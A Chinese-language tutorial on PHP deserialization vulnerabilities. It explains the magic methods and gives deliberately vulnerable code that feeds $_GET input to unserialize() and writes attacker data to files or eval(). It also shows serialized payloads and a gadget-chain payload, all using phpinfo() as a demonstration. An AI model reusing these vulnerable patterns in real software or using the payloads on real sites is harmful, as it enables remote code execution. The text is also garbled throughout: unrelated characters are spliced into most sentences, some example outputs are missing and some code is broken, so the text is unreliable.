0x01 概述
什么是php反序列化漏洞呢?簡(jiǎn)單的來(lái)說(shuō)找前,就是在php反序列化的時(shí)候糟袁,反序列化的內(nèi)容是用戶(hù)可控,那么惡意用戶(hù)就可以構(gòu)造特定序列化內(nèi)容的代碼躺盛,通過(guò)unserialize()函數(shù)進(jìn)行特定的反序列化操作项戴,并且程序的某處存在一些敏感操作是寫(xiě)在類(lèi)中的,那么就可以通過(guò)這段惡意代碼槽惫,達(dá)到執(zhí)行攻擊者想要的操作肯尺。
在了解php反序列化漏洞之前,需要了解一下php序列化和反序列化的相關(guān)知識(shí)躯枢。
0x02 PHP序列化與反序列化
<?php
class Test{
public $var = "This is a test";
public function PrintVar(){
echo this -> $var;
}
}
$obj = new Test();
$obj->PrintVar();
?>
運(yùn)行后
magic 函數(shù)
php面向?qū)ο笞兂芍性蛞鳎幸活?lèi)函數(shù)叫做magic function,魔術(shù)函數(shù)锄蹂,這些函數(shù)是以__(雙下劃線)開(kāi)頭的氓仲,他們是一些當(dāng)依照某些規(guī)則實(shí)例化類(lèi)或者調(diào)用某些函數(shù)的時(shí)候會(huì)自動(dòng)調(diào)用這些magic函數(shù),這里說(shuō)一下比較常見(jiàn)的例如__construct得糜,__destory敬扛,
__sleep,__wakeup朝抖,__toString函數(shù)啥箭。
__construct()
__contstruct()函數(shù)被稱(chēng)為構(gòu)造函數(shù),當(dāng)實(shí)例化類(lèi)的時(shí)候會(huì)自動(dòng)調(diào)用該函數(shù)__destruct()
__destruct()函數(shù)被稱(chēng)為析構(gòu)函數(shù)治宣,當(dāng)類(lèi)結(jié)束的時(shí)候自動(dòng)調(diào)用該函數(shù)__sleep()
__sleep()函數(shù)是當(dāng)php進(jìn)行序列化操作(serialize)的時(shí)候自動(dòng)調(diào)用該函數(shù)急侥,可以用于清理對(duì)象,并返回一個(gè)包含對(duì)象中所有應(yīng)被序列化的變量名稱(chēng)的數(shù)組侮邀。如果該方法未返回任何內(nèi)容坏怪,則 NULL 被序列化,并產(chǎn)生一個(gè) E_NOTICE 級(jí)別的錯(cuò)誤绊茧。__wakeup()
__wakeup()函數(shù)是當(dāng)php進(jìn)行反序列化操作(unserialize)的時(shí)候自動(dòng)調(diào)用該函數(shù)__toString()
__toString()函數(shù)是當(dāng)對(duì)象被當(dāng)做字符串的時(shí)候會(huì)自動(dòng)調(diào)用該函數(shù)
例如:
運(yùn)行后結(jié)果:
私有成員與被保護(hù)成員變量的特殊性
當(dāng)類(lèi)中的成員變量是私有的或者被保護(hù)的铝宵,那么會(huì)產(chǎn)生一些特殊的情況
運(yùn)行結(jié)果:
我們可以看到,在序列化后得到的序列化代碼中华畏,私有成員變量name前加了一個(gè)User鹏秋,被保護(hù)變量成員age的前面加了一個(gè)尊蚁,并且明明Username長(zhǎng)度為8,但是卻顯示的是10侣夷;同樣横朋,明明age的長(zhǎng)度為4,但卻顯示的是6惜纸。
查閱php手冊(cè)發(fā)現(xiàn)叶撒,當(dāng)成員變量是私有的時(shí)候,會(huì)在成員變量前面添加類(lèi)名耐版;當(dāng)成員變量是被保護(hù)的時(shí)候祠够,會(huì)在被保護(hù)成員前面添加一個(gè),并且粪牲,所添加的類(lèi)名或者的左右兩邊都會(huì)有一個(gè)null字節(jié)古瓤,因此,這兩個(gè)長(zhǎng)度都增加了2腺阳。
0x03 PHP反序列化漏洞
- __wakeup()或__destruct()的利用場(chǎng)景
假設(shè)服務(wù)器的代碼如下:
<?php
class Test{
var $test = "123";
function __wakeup(){
$fp = fopen("test.php", 'w');
fwrite($fp, $this -> test);
fclose($fp);
}
}
$test1 = $_GET['test'];
print_r($test1);
echo "<br />";
$seri = unserialize($test1);
require "test.php";
?>
我們可以在本地搭建環(huán)境落君,編寫(xiě)exp之后用serialize函數(shù)進(jìn)行序列化,得到payload亭引,如:
O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}
- 其他Magic Function情況
當(dāng)unserialize的時(shí)候不是直接在wakup魔術(shù)方法中利用绎速,比如在construct之類(lèi)的,也是有利用價(jià)值的焙蚓。譬如纹冤,當(dāng)wakup中又調(diào)用了別的對(duì)象,那么我們就可以進(jìn)行回溯去找购公,也許也可以利用到萌京。例如:
<?php
class Test1{
function __construct($test){
$fp = fopen("shell.php", "w");
fwrite($fp, $test);
fclose($fp);
}
}
class Test2{
var $test = "123";
function __wakeup(){
$obj = new Test1($this -> test);
}
}
$test = $_GET['test'];
unserialize($test);
require "shell.php";
?>
- 普通情況
當(dāng)危險(xiǎn)代碼存在類(lèi)的普通方法中,就不能指望通過(guò)“自動(dòng)調(diào)用”來(lái)達(dá)到目的了宏浩。這時(shí)可以尋找相同的函數(shù)名知残,把敏感函數(shù)和類(lèi)聯(lián)系在一起。
<?php
class Test1{
var $test1;
function __construct(){
$this->test1 = new Test2();
}
function __destruct(){
$this->test1->action();
}
}
class Test2{
function action(){
echo "Test2";
}
}
class Test3{
var $test3;
function action(){
eval($this->test3);
}
}
$test = new Test1();
unserialize($_GET['test']);
?>
這里我們可以利用Test3中的action函數(shù)中的eval函數(shù)做一些事情比庄。
class Test1{
var $test1;
function __construct(){
$this->test1 = new Test3();
}
function __destruct(){
$this->test1->action();
}
}
class Test3{
var $test3 = "phpinfo();";
}
echo serialize(new Test1());
得到 O:5:"Test1":1:{s:5:"test1";O:5:"Test3":1:{s:5:"test3";s:10:"phpinfo();";}}
